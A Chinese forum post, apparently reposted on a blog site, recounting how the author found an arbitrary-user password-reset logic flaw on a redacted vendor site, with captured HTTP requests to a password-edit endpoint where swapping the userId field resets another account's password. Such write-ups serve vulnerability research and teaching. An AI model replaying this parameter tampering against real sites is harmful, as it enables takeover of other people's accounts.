php mvc漏洞挖掘,一次简单的逻辑漏洞挖掘案例/任意用户密码重置漏洞挖掘过程...

本帖最后由 小爱_Joker 于 2017-5-27 01:43 编辑

挖掘逻辑漏洞 基本都是前端问题 过滤不严格 导致  熬夜挖漏洞盒子厂商!!

身为一个正在学习挖掘逻辑漏洞的小彩笔来说  首先是找二级 或者三 四级域名 大厂商的话主站 是别想了 当然 很少有主站存在很多漏洞的厂商

挖掘逻辑漏洞 先注册个账户

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527035429.png (429.39 KB, 下载次数: 47)

2017-5-27 03:55 上传

注册完成后 找回密码

找回密码的这里他会提示你验证码不对

邮箱收到的验证码是四位数 懒得爆破了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527040550.png (27.01 KB, 下载次数: 48)

2017-5-27 04:05 上传

直接进入主题

前端有个验证 这个管理员做的很不错

换种思路

输入正确的验证码 burp抓包

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527040738.png (60.99 KB, 下载次数: 59)

2017-5-27 04:08 上传

go一下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527040909.png (60.01 KB, 下载次数: 50)

2017-5-27 04:09 上传

发现返回包回显了true

数据包

[AppleScript] 纯文本查看 复制代码POST /WebShow/EditPassword HTTP/1.1

Host: xxxxxxxxx

Content-Length: 36

Accept: */*

Origin: http://xxxx

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://xxxx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASP.NET_SessionId=j05uko4ktviennntuk515ka1

Connection: close

userId=xxx1588x@qq.com&psd=xxxxxx@

返回包

[AppleScript] 纯文本查看 复制代码HTTP/1.1 200 OK

Cache-Control: private

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNetMvc-Version: 4.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 26 May 2017 20:01:37 GMT

Connection: close

Content-Length: 4

true

这个时候我又去注册了个用户 因为没有注册限制 前端缺陷 也不用验证码

注册一个用户为[email]888888888888@qq.com[/email]  密码为test888

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527041205.png (199.64 KB, 下载次数: 39)

2017-5-27 04:12 上传

注册成功后

返回burp

发包

修改密码为123456test

[AppleScript] 纯文本查看 复制代码POST /WebShow/EditPassword HTTP/1.1

Host: xxxxx

Content-Length: 42

Accept: */*

Origin: [url]http://xxxxxx[/url]

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: [url]http://xxxx/[/url]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASP.NET_SessionId=j05uko4ktviennntuk515ka1

Connection: close

userId=888888888888@qq.com &psd=123456test

返回包

[AppleScript] 纯文本查看 复制代码HTTP/1.1 200 OK

Cache-Control: private

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNetMvc-Version: 4.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 26 May 2017 20:12:32 GMT

Connection: close

Content-Length: 4

true

这么来说吧   true 是真正的意思 也就是操作成功的意思

登录验证

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170527041439.png (22.72 KB, 下载次数: 44)

2017-5-27 04:14 上传

- - !思路仅供学习 大佬们勿喷。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值